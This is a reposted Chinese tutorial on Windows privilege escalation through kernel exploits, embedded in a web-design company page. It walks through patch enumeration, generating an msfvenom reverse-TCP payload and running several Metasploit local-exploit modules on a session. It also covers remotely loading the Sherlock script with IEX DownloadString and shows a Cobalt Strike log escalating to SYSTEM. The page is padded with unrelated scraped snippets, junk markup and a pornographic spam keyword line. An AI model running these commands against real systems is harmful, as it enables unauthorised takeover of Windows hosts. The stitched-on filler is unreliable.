1. <nobr id="easjo"><address id="easjo"></address></nobr>

      <track id="easjo"><source id="easjo"></source></track>
      1. 
        

      2. <bdo id="easjo"><optgroup id="easjo"></optgroup></bdo>
      3. <track id="easjo"><source id="easjo"><em id="easjo"></em></source></track><option id="easjo"><span id="easjo"><em id="easjo"></em></span></option>
          貴州做網站公司
          貴州做網站公司~專業!靠譜!
          10年網站模板開發經驗,熟悉國內外開源網站程序,包括DEDECMS,WordPress,ZBlog,Discuz! 等網站程序,可為您提供網站建設,網站克隆,仿站,網頁設計,網站制作,網站推廣優化等服務。我們專注高端營銷型網站,企業官網,集團官網,自適應網站,手機網站,網絡營銷,網站優化,網站服務器環境搭建以及托管運維等。為客戶提供一站式網站解決方案?。?!

          系統內核溢出提權

          來源:互聯網轉載 時間:2024-01-29 07:53:44

          文章前言

          在后滲透測試階段,權限提升是一個繞不開的話題,其中"系統內核溢出提權"因其利用便捷成為了最為常用的方法,在使用該方法提權時我們只需要去查看目標系統中打了那些系統補丁,之后去找補丁的"互補"補丁,并利用對應的提權類的漏洞實現權限提升,本篇文章主要圍繞"系統內核溢出提權"的一些方法、思路進行簡易介紹~

          權限查看

          在獲取到目標系統的shell后,我們需要先確認以下當前用戶以及用戶權限,這一點可以通過在shell中輸入"whoami"以及"whoami /groups"來確定:

          whoamiwhoami /groups

          從上面的顯示結果可以看到當前用戶為"?win-op8vb0nlureal1ex",權限為"Mandatory LabelMedium Mandatory Level",而這里的"Mandatory LabelMedium Mandatory Level"是一個標準的普通用戶權限,而我們再提權階段要做得就是將此處的"Medium Mandatory Level"提升為"High?Mandatory Level"。

          補丁查詢

          利用系統溢出漏洞進行提權的關鍵是通過查看系統的補丁信息來找尋缺失的、可以利用來提權的補丁進行提權,下面介紹幾種常見的補丁查詢思路與方法

          系統命令查看

          在Windows操作系統中我們可以通過執行systeminfo來查看目標機器上安裝的補丁信息:

          systeminfo

          從上圖可以看到這里安裝了三個補丁:

          • [01]: KB2534111
          • [02]: KB2999226
          • [03]: KB976902

          同時我們也可以通過WMIC來快速查看當前系統安裝的補丁信息:

          wmic qfe get Caption,Description,HotFixID,InstalledOn

          如果想要查詢系統是否安裝某一個特定的補丁,可以通過以下命令進行簡易查詢:

          wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /c:"KB2534111" /c:"KB976902"

          既然已經確定了當前系統的補丁信息,那么后續如何利用呢?當然是去查找缺失的、可以利用的補丁了!但是怎么找呢?不可能在茫茫大海中找吧?當然不是,這里推薦一個輔助網站:https://bugs.hacking8.com/tiquan/

          我們可以在"補丁號"選項框中輸入當前系統的補丁信息,之后進行查詢來獲取當前系統的缺失的、可以利用的補丁信息,這里以上面查詢的補丁信息為例:

          之后可以根據補丁來推薦相關的漏洞利用EXP,不過在使用EXP時還需要主要影響的操作系統:

          關于提權類的EXP,這里推薦一個項目:https://github.com/Al1ex/WindowsElevation

          該項目源自SecWiki維護的Windows-kernel-exploit,但是由于原作者不再更新與維護所以后期由筆者重新進行構建維護,同時也涵蓋了Bypass UAC系列,目前還在不斷的更新與完善中,同時該項目也主要用于收集網絡上公開的各大有價值的漏洞EXP/POC~

          MSF框架查看

          MSF框架中自帶提權輔助功能模塊——post/windows/gather/enum_pathes,該模塊會根據漏洞編號快速查找目標系統中的補丁信息,下面以目標主機為例做一個簡單的演示:

          首先,我們需要獲取目標主機的一個Shell,這里我們再測試環境中直接通過MSFvenom來生成Payload:

          msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f exe > shell.exe

          之后在MSF中設置監聽:

          之后再目標主機中執行EXE

          之后成功返回會話:

          之后在Meterpreter中執行如下命令即可查看系統補丁信息(老版本的會給出可用的EXP,MSF5好像不提供了):

          run post/windows/gather/enum_patches

          于此同時,我們也可以通過執行以下命令來查看目標系統可用的漏洞,之后探尋提權EXP:

          run post/multi/recon/local_exploit_suggester

          其他一些常見的模塊例如:

          Windows ClientCopyImage Win32k Exploit:

          Windows內核模式驅動程序中的漏洞可能允許特權提升,此模塊利用win32k.sys內核模式驅動程序中不正確的對象處理,此模塊已在Windows 7 x64和x86、Windows 2008 r2 sp1 x64的易受攻擊版本上進行了測試

          use exploit/windows/local/ms15_051_client_copy_imageset lhost 192.168.1.107set session 1exploit

          Windows TrackPopupMenu Win32k NULL Pointer Dereference:

          此模塊已在Windows xp sp3、Windows server 2003 sp2、Windows 7 sp1、Windows server 2008 r2位和Windows server 2008 r2 sp1 64位上進行了測試

          use exploit/windows/local/ms14_058_track_popup_menuset lhost 192.168.1.107set session 1exploit

          Windows SYSTEM Escalation via KiTrap0D:

          use exploit/windows/local/ms10_015_kitrap0dset lhost 192.168.1.107set session 1exploit

          Windows Escalate Task Scheduler XML Privilege Escalation:

          use exploit/windows/local/ms10_092_schelevatorset lhost 192.168.1.107set session 1exploit

          MS16-016 mrxdav.sys WebDav Local Privilege Escalation:

          use exploit/windows/local/ms16_016_webdavset lhost 192.168.1.107set session 1exploit

          EPATHOBJ::pprFlattenRec Local Privilege Escalation:

          use exploit/windows/local/ppr_flatten_recset lhost 192.168.1.107set session 1exploit

          MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow:

          use exploit/windows/local/ms13_053_ schlampereiset lhost 192.168.1.107set session 1exploit

          MS16-032 Secondary Logon Handle Privilege Escalation:

          use exploit/windows/local/ms16_032_secondary_logon_handle_privescset session 1exploit

          Empire內置模塊

          Empire框架也提供了關于內核溢出漏洞提權的漏洞利用方法,下面進行簡單演示:

          usemodule privesc/powerup/allchecksexecute

          PS:總體來看效果不是很理想,不如MSF~

          PowerShell腳本

          Sherlock(https://github.com/rasta-mouse/Sherlock)是一個在Windows下用于本地提權的PowerShell腳本,目前包含了以下漏洞:

          • MS10-015 : User Mode to Ring (KiTrap0D)
          • MS10-092 : Task Scheduler
          • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
          • MS13-081 : TrackPopupMenuEx Win32k NULL Page
          • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
          • MS15-051 : ClientCopyImage Win32k
          • MS15-078 : Font Driver Buffer Overflow
          • MS16-016 : 'mrxdav.sys' WebDAV
          • MS16-032 : Secondary Logon Handle
          • MS16-034 : Windows Kernel-Mode Drivers EoP
          • MS16-135 : Win32k Elevation of Privilege
          • CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

          該工具的利用也是較為簡單,首先下載項目到本地,之后再終端調用Sherlock(獲取webshell的主機中直接上傳即可):

          Import-Module .Sherlock.ps1

          當然也可以遠程加載:

          IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

          之后執行以下命令來列舉當前系統中所有可利用的漏洞:

          Find-AllVulns

          當然你也可以搜索某一個特定漏洞,例如:

          Find-CVE20177199

          根據Sherlock的說明目前CS已經可以實現" 導入模塊——>查詢單一漏洞——>直接提權 "的一套流程了,下面是Github中的實例:

          beacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 20 bytes[*] You are Win7-x64Rastabeacon> powershell-import C:UsersRastaDesktopSherlock.ps1[*] Tasked beacon to import: C:UsersRastaDesktopSherlock.ps1[+] host called home, sent: 2960 bytesbeacon> powershell Find-MS14058[*] Tasked beacon to run: Find-MS14058[+] host called home, sent: 20 bytes[+] received output:Title      : TrackPopupMenu Win32k Null Pointer DereferenceMSBulletin : MS14-058CVEID      : 2014-4113Link       : https://www.exploit-db.com/exploits/35101/VulnStatus : Appears Vulnerablebeacon> elevate ms14-058 smb[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)[+] host called home, sent: 105015 bytes[+] received output:[*] Getting Windows version...[*] Solving symbols...[*] Requesting Kernel loaded modules...[*] pZwQuerySystemInformation required length 51216[*] Parsing SYSTEM_INFO...[*] 173 Kernel modules found[*] Checking module SystemRootsystem32ntoskrnl.exe[*] Good! nt found as ntoskrnl.exe at 0x0264f000[*] ntoskrnl.exe loaded in userspace at: 40000000[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0[*] Registering class...[*] Creating window...[*] Allocating null page...[*] Getting PtiCurrent...[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0[*] Creating a fake structure at NULL...[*] Triggering vulnerability...[!] Executing payload...[+] host called home, sent: 204885 bytes[+] established link to child beacon: 192.168.56.105beacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 8 bytes[*] You are NT AUTHORITYSYSTEM (admin)

          PS:關于該Powershell的利用還有很多單一漏洞的查詢,讀者可以根據源碼進行分析~

          Windows Exploit Suggester

          工具介紹

          Windows-Exploit-Suggester(https://github.com/GDSSecurity/Windows-Exploit-Suggester )是受Linux_Exploit_Suggester的啟發而開發的一款提權輔助工具,,它是用python開發而成,運行環境是python3.3及以上版本,且必須安裝xlrd,其主要功能是通過比對systeminfo生成的文件,從而發現系統是否存在未修復漏洞。

          工具原理

          Windows-Exploit-Suggester通過下載微軟公開漏洞庫到本地“生成日期+mssb.xls”文件,然后根據操作系統版本,跟systeminfo生成的文件進行比對。微軟公開漏洞庫下載地址:http://www.microsoft.com/en-gb/download/confirmation.aspx?id=36982?。同時此工具還會告知用戶針對于此漏洞是否有公開的exp和可用的Metasploit模塊。

          工具安裝

          安裝依賴xlrd:

          pip install xlrd

          之后下載Windows-Exploit-Suggester項目到本地:

          git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester

          更新漏洞庫

          之后執行以下命令,自動從微軟官網下載安全公告數據庫,下載的文件會自動保存在當前目錄下:

          ./windows-exploit-suggester.py --update

          獲取系統信息

          之后在目標系統中獲取systeminfo信息并將其保存到一個txt文件夾中:

          systeminfo > sysinfo.txt

          系統漏洞檢索

          之后將目標系統中的sysinfo.txt文件復制出來,到安裝有Windows-Exploit-Suggester的主機上去執行如下命令,查詢系統中存在的可用漏洞信息,這里的參數d為指定漏洞庫,也就是之前跟新漏洞庫后的xlsx文件:

          ./windows-exploit-suggester.py -d 2020-09-09-mssb.xls -i sysinfo.txt

          總體上效果還不錯,挺讓人滿意的,不過該工具也有一個缺點——更新數據庫后下載的數據庫最新的2017年的,有點局限

          補丁列表

          最后給出一個常用的補丁列表信息,可能數據有點成舊哈~

          CVE ID

          MS ID

          KB

          Operating System

          CVE-2003-0352

          MS03-026

          KB823980

          Windows 2003/XP/2000/NT 4.0/Server 2003

          CVE-2005-1983

          MS05-039

          KB899588

          Windows 2000/XP SP1/Server 2003

          CVE-2006-3439

          MS06-040

          KB921883

          Windows 2000/XP/Server 2003

          CVE-2008-1084

          MS08-025

          KB941693

          Windows 2000/XP/Server 2003/Vista SP1/Server 2008

          CVE-2008-3464

          MS08-066

          KB910723

          Windows XP/Server 2003

          CVE-2008-4037

          MS08-068

          KB887429

          Windows XP/Server 2000/Vista/Server 2008

          CVE-2008-4250

          MS08-067

          KB958644

          Windows XP/Vista/Server 2000 2003 2008

          CVE-2009-0079

          MS09-012

          KB956572

          Windows XP/Server 2000 2003 2008/Vista

          CVE-2009-1535

          MS09-020

          KB970483

          Windows XP/Server 2000 2003

          CVE-2009-2532

          MS09-050

          KB975517

          Windows Vista/Server 2008

          CVE-2010-0020

          MS10-020

          KB980232

          Windows XP/2000/2003/2008/2008 R2/Vista/7

          CVE-2010-0232

          MS10-015

          KB977165

          Windows 2000/XP/2003/Vista/2008/7

          CVE-2010-1887

          MS10-048

          KB2160329

          Windows XP/2003/2008/7/Vista

          CVE-2010-1899

          MS10-065

          KB2271195

          Windows XP/2003/2008/7/Vista

          CVE-2010-2554

          MS10-059

          KB982799

          Window Vista/2008/7

          CVE-2010-3338

          MS10-092

          KB2305420

          Windows Vista/7/2008

          CVE-2010-4398

          MS11-011

          KB2393802

          Windows XP/Server 2003/Vsita/2008/7

          CVE-2011-1249

          MS11-046

          KB2503665

          Windows XP/2003/2008

          CVE-2011-1974

          MS11-062

          KB2566454

          Windows XP/2003

          CVE-2011-2005

          MS11-080

          KB2592799

          Windows XP/Server 2003

          CVE-2012-0002

          MS12-020

          KB2621440

          Winodws XP/2003/2008/Vista/7

          CVE-2013-0008

          MS13-005

          KB2778930

          Windows Vista/2008/2012/7/8/RT

          CVE-2013-1300

          MS13-053

          KB2850851

          Windows XP/2003/2008/2012/7/8

          CVE-2013-1332

          MS13-046

          KB2829361

          Windows XP/2003/2008/2012/7/8/RT

          CVE-2013-5065

          MS14-002

          KB2914368

          Windows XP/2003

          CVE-2014-1767

          MS14-040

          KB2961072

          Windows XP/2003/2008/2012/7/8/RT/Vista

          CVE-2014-2814

          MS14-042

          KB2972621

          Windows Server 2008/2012

          CVE-2014-4076

          MS14-070

          Windows 2003

          CVE-2014-4113

          MS14-058

          KB3000061

          Windows 2003/2008/2012/Vista/7/RT

          CVE-2014-6321

          MS14-066

          Windows server 2003/2008/2012/Vista/7

          CVE-2014-6324

          MS14-068

          Windows 2003/2008/2012/Vista/7/8

          CVE-2015-0002

          MS15-001

          Windows 7/8/2008/2012/

          CVE-2015-0057

          MS15-010

          Windows 2003/2008/2012/vista/7/8/RT

          CVE-2015-0062

          MS15-015

          Windows 7/8/2008/2012/RT

          CVE-2015-0097

          MS15-022

          Microsoft Office 2007/2010/2013/RT

          CVE-2015-1701

          MS15-051

          KB3065979

          WIndows 2003/2008/2012/Vista/7/8

          CVE-2015-1726

          MS15-061

          WIndows 2003/2008/2012/Vista/7/8

          CVE-2015-2370

          MS15-076

          WIndows 2003/2008/2012/Vista/7/8

          CVE-2015-2387

          MS15-077

          WIndows 2003/2008/2012/Vista/7/8

          CVE-2015-2517

          MS15-097

          KB3081455

          Windows 2003/2008/2012/Vista/RT/7/8/10

          CVE-2016-0040

          MS16-014

          KB3135174

          Windows 2003/2008/2012/Vista/RT/7/8/10

          CVE-2016-0051

          MS16-016

          KB3135173

          Windows 2003/2008/2012/Vista/RT/7/8/10

          CVE-2016-0093

          MS16-034

          KB3140745

          Windows 2003/2008/2012/Vista/RT/7/8/10

          CVE-2016-0099

          MS16-032

          KB3140768

          Windows 2003/2008/2012/Vista/RT/7/8/10

          CVE-2016-3225

          MS16-075

          KB3163017

          Windows 2003/2008/2012/Vista/RT/7/8/10

          CVE-2016-3305

          MS16-111

          KB3185611

          Windows 2008/2012/Vista/RT/7/8/10

          CVE-2016-3308

          MS16-098

          KB3176492

          Windows 2008/2012/Vista/RT/7/8/10

          CVE-2016-7214

          MS16-135

          KB3198234

          Windows Vista/2008/2012/2016/7/8

          CVE-2017-0050

          MS17-017

          KB4011981

          Windows Vista/2008/2012/2016/7/8/10

          CVE-2017-0143

          MS17-010

          Windows Vista/2008/2012/2016/7/8/10

          CVE-2017-0213

          KB4038788

          Windows Vista/2008/2012/2016/7/8/10

          CVE-2017-8464

          KB4022727

          Windows Vista/2008/2012/2016/7/8/10

          CVE-2018-0833

          KB4074594

          Windows 8/2012 R2/RT

          CVE-2018-8120

          KB4103718

          Windows 2008/2008 R2/7

          CVE-2019-0803

          KB4493471

          Windows Vista/2008/2012/2016/2019/7/8/10

          CVE-2019-0863

          KB4494440

          Windows 2008/7/8/10

          CVE-2019-1253

          KB4515384

          Windows 10 1903/1709/1803/1703

          CVE-2019-1405

          KB4525235

          Windows 2008/2012/2016/2019/7/8/10

          CVE-2020-0668

          KB4532693

          Windows 2008/2012/2016/2019/7/8/10

          CVE-2020-0683

          KB4532691

          Windows 2008/2012/2016/2019/7/8/10

          CVE-2020-0787

          KB4541505

          Windows 2008/2012/2016/2019/7/8/10

          CVE-2020-0796

          KB4499165

          Windows 10 1909/1903/

          CVE-2020-1054

          KB4556826

          Windows 2008/2012/7/8/10

          CVE-2020-1066

          KB4552965

          Microsoft .NET Framework 3.5.1/3.0

          CVE-2020-1337

          KB4571694

          Windows 2012/7/10

          CVE-2020-1362

          KB4565503

          Windows 10 1903/1809/1607/2004/1709

          標簽:kb2393802-
          上一篇:SEO知識

          網絡推廣與網站優化公司(網絡優化與推廣專家)作為數字營銷領域的核心服務提供方,其價值在于通過技術手段與策略規劃幫助企業提升線上曝光度、用戶轉化率及品牌影響力。這...

          在當今數字化時代,公司網站已成為企業展示形象、傳遞信息和開展業務的重要平臺。然而,對于許多公司來說,網站建設的價格是一個關鍵考量因素。本文將圍繞“公司網站建設價...

          在當今的數字化時代,企業網站已成為企業展示形象、吸引客戶和開展業務的重要平臺。然而,對于許多中小企業來說,高昂的網站建設費用可能會成為其發展的瓶頸。幸運的是,隨...

          endnote x4,怎么把插入word的作者跟年份變成數字上標。如圖?編輯輸出樣式之一已編號。就選這個吧。如果是上標,我今天找了很久才解決。首先檢查編號。然后點擊編輯輸出樣式編輯“編號”,選擇左側引文下的模板,選擇【書目編號】,設置為“上標”,即工具欄上的“A1”。你可以看到哪個上標被設置了。將其另存為您自己的命名樣式,例如“num”?,F在問題又來了。在word中將樣式設置為“num”,但是前面...

          四川樂山到成都有多少公里?從樂山到成都開車總里程140.9公里,行車時間1小時37分,油費約89元,通過高速公路收費站總通行費約50元。還是比較快的。不開車的話,也可以選擇動車,挺好的,舒服又快。全程只需要一個小時,比開車還方便。成都到樂山開車要開多久?過路費多少?從成都開車到樂山有142.2公里。7座及以下乘用車收費55元,耗時2小時5分鐘,預計油費70元。樂山離四川市遠嗎?四川是一個省,樂山是...

          北京南站附近有便宜旅館嗎?南站附近的酒店很難找。我在特價酒店聯盟上給你搜了一下,發現最近最便宜的是這家:北京新港快捷酒店,酒店地址:北京市豐臺區南三環西1號(北京南站南廣場,近洋橋),178元/晚。價格和你們的差不多。如果你對這家酒店不滿意,也可以登錄特價酒店聯盟自行了解。按酒店位置附近的地標搜索,很容易找到。酒店聯盟有哪些?“酒店”和“聯盟”,酒店是主體,聯盟是形式。當然,我們可以理解為酒店聯盟...

          TOP
          国产初高中生视频在线观看|亚洲一区中文|久久亚洲欧美国产精品|黄色网站入口免费进人
          1. <nobr id="easjo"><address id="easjo"></address></nobr>

              <track id="easjo"><source id="easjo"></source></track>
              1. 
                

              2. <bdo id="easjo"><optgroup id="easjo"></optgroup></bdo>
              3. <track id="easjo"><source id="easjo"><em id="easjo"></em></source></track><option id="easjo"><span id="easjo"><em id="easjo"></em></span></option>